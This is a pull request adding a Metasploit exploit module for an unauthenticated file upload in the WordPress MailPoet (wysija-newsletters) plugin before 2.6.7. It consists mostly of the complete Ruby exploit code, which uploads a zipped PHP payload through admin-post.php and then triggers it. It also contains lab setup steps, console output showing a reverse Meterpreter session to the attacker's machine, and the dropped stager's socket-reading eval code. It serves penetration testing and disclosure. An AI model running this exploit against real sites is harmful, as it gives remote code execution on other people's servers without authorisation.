### PR TITLE
Wordpress - Added wysija file upload exploit

### DIFF
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # readme present, but no version number
     if version.nil?
-      return Msf::Exploit::CheckCode::Unknown
+      return Msf::Exploit::CheckCode::Detected
     end
 
     print_status("#{peer} - Found version #{version} of the plugin")

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -58,7 +58,33 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
+    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
+    res = send_request_cgi({
+      'uri'    => readme_url,
+      'method' => 'GET'
+    })
+    # no readme present, so we can assume it's safe
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Safe
+    end
 
+    # try to extract version from readme
+    # Example line:
+    # Stable tag: 2.6.6
+    version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
+
+    # readme present, but no version number
+    if version.nil?
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - Found version #{version} of the plugin")
+
+    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
+      return Msf::Exploit::CheckCode::Appears
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
   end
 
   def exploit
@@ -92,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Executing payload #{payload_uri}")
-    res = send_request_raw({
+    res = send_request_cgi({
       'uri'    => payload_uri,
       'method' => 'GET'
     })

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => readme_url,
       'method' => 'GET'
     })
-    # no readme present, so we can assume it's safe
+    # no readme.txt present
     if res.nil? || res.code != 200
       return Msf::Exploit::CheckCode::Unknown
     end
@@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    theme_name = Rex::Text.rand_text_alpha(10)
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    theme_name = rand_text_alpha(10)
+    payload_name = "#{rand_text_alpha(10)}.php"
 
     zip_content = create_zip_file(theme_name, payload_name)
 
     uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')
 
     data = Rex::MIME::Message.new
-    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\"")
+    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wordpress MailPoet (wysija-newsletters) unauthenticated file upload',
+      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload',
       'Description'    => %q{
           The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
           is vulnerable to an unauthenticated file upload. The plugin used the admin_init
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Marc-Alexandre Montpas',	# initial discovery
+          'Marc-Alexandre Montpas', # initial discovery
           'Christian Mehlmauer'     # metasploit module
         ],
       'License'        => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -15,10 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload',
       'Description'    => %q{
           The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
-          is vulnerable to an unauthenticated file upload. The plugin used the admin_init
-          hook without knowning the hook is also executed for unauthenticated users when
-          calling the right URL. This module needs manual cleanup of the uploaded theme
-          directory.
+          is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
+          functionality to upload a zip file containing the payload. The plugin used the
+          admin_init hook without knowning the hook is also executed for unauthenticated
+          users when calling the right URL. This module needs manual cleanup of the uploaded
+          theme directory.
       },
       'Author'         =>
         [

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -18,8 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
           is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
           functionality to upload a zip file containing the payload. The plugin used the
           admin_init hook without knowning the hook is also executed for unauthenticated
-          users when calling the right URL. This module needs manual cleanup of the uploaded
-          theme directory.
+          users when calling the right URL.
       },
       'Author'         =>
         [
@@ -54,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
     content.each_pair do |name, content|
       zip_file.add_file(name, content)
     end
+
     zip_file.pack
   end
 
@@ -113,9 +114,17 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'     => post_data
     })
 
-    if not res || res.code != 302 || res.header['Location'] !~ 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
+    if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
+
+    # Files to cleanup (session is dropped in the created folder):
+    #   style.css
+    #   the payload
+    #   the theme folder (manual cleanup)
+    register_files_for_cleanup('style.css', payload_name)
+
+    print_status("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
 
     print_status("#{peer} - Executing payload #{payload_uri}")
     res = send_request_cgi({

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -1,0 +1,99 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress MailPoet (wysija-newsletters) unauthenticated file upload',
+      'Description'    => %q{
+          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
+          is vulnerable to an unauthenticated file upload. The plugin used the admin_init
+          hook without knowning the hook is also executed for unauthenticated users when
+          calling the right URL. This module needs manual cleanup of the uploaded theme
+          directory.
+      },
+      'Author'         =>
+        [
+          'Marc-Alexandre Montpas',	# initial discovery
+          'Christian Mehlmauer'     # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['wysija-newsletters < 2.6.7', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 1 2014'))
+  end
+
+  def create_zip_file(theme_name, payload_name)
+    # the zip file must match the following:
+    #  -) Exactly one folder representing the theme name
+    #  -) A style.css in the theme folder
+    #  -) Additional files in the folder
+
+    content = {
+      File.join(theme_name, 'style.css') => '',
+      File.join(theme_name, payload_name) => payload.encoded
+    }
+
+    zip_file = Rex::Zip::Archive.new
+    content.each_pair do |name, content|
+      zip_file.add_file(name, content)
+    end
+    zip_file.pack
+  end
+
+  def check
+
+  end
+
+  def exploit
+    theme_name = Rex::Text.rand_text_alpha(10)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+
+    zip_content = create_zip_file(theme_name, payload_name)
+
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')
+
+    data = Rex::MIME::Message.new
+    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\"")
+    data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
+    data.add_part('themeupload', nil, nil, 'form-data; name="action"')
+    data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    post_data = data.to_s
+
+    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
+
+    print_status("#{peer} - Uploading payload to #{payload_uri}")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => uri,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
+      'data'     => post_data
+    })
+
+    if not res || res.code != 302 || res.header['Location'] !~ 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
+      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    print_status("#{peer} - Executing payload #{payload_uri}")
+    res = send_request_raw({
+      'uri'    => payload_uri,
+      'method' => 'GET'
+    })
+  end
+end

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
     # no readme present, so we can assume it's safe
     if res.nil? || res.code != 200
-      return Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Unknown
     end
 
     # try to extract version from readme


### PR DESCRIPTION
This exploits a PHP file upload vuln in the wysija-newsletters wordpress plugin. According to https://wordpress.org/plugins/wysija-newsletters/ there are currently 1,744,325 downloads of the plugin.

I managed to establish a connection to the uploaded script, but it looks like the PHP meterpreter is somehow broken (It hangs right after `Meterpreter session 1 opened`).
I tried to debug it, add some debug output and so on, but i didn't manage to find the error (see below)

The script on the server is executed successfully, so I think the module should be good to go because it looks like a general php-meterpreter error to me.
### Verification Steps
- [x] Setup a Wordpress test machine: http://codex.wordpress.org/Installing_WordPress (Ubuntu 12.04, newer versions are not meterpreter compatible)
- [x] Download vulnerable plugin: http://downloads.wordpress.org/plugin/wysija-newsletters.2.6.6.zip
- [x] Edit php.ini (in Ubuntu under `/etc/php5/apache2/php.ini` and change `upload_max_filesize = 2M` to `upload_max_filesize = 20M` (otherwise you can not upload the zip)
- [x] Restart Apache after the php.ini change
- [x] Open Wordpress Admin Interface --> Plugins --> Add new --> Upload --> Upload the ZIP file
- [x] Activate the plugin
- [x] Verify the plugin has it's option dialog in the backend (on the left side named `MailPoet`)
- [x] Run the exploit
- [x] Watch `WWWROOT/wp-content/uploads/wysija/themes/` for the dropped shell
### Sample Output

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli exploit/unix/webapp/wp_wysija_newsletters_upload RHOST=192.168.126.134 TARGETURI=/wordpress/ E
[*] Initializing modules...
RHOST => 192.168.126.134
TARGETURI => /wordpress/
[*] Started reverse handler on 192.168.126.160:4444 
[*] 192.168.126.134:80 - Uploading payload to /wordpress/wp-content/uploads/wysija/themes/rDHODUYZov/oVwdOQqPqI.php
[*] 192.168.126.134:80 - Executing payload /wordpress/wp-content/uploads/wysija/themes/rDHODUYZov/oVwdOQqPqI.php
[*] Sending stage (39904 bytes) to 192.168.126.134
[*] Meterpreter session 1 opened (192.168.126.160:4444 -> 192.168.126.134:37456) at 2014-07-02 10:29:05 +0200
^C[-] Exploit failed: Interrupt 

meterpreter > 
```

On the server side:

```
root@wordpress:/var/www/wordpress/wp-content/uploads/wysija/themes# tree
.
└── rDHODUYZov
    ├── oVwdOQqPqI.php
    └── style.css

1 directory, 2 files
root@wordpress:/var/www/wordpress/wp-content/uploads/wysija/themes# tail rDHODUYZov/oVwdOQqPqI.php
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
        }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();

```

cc @brandonprry
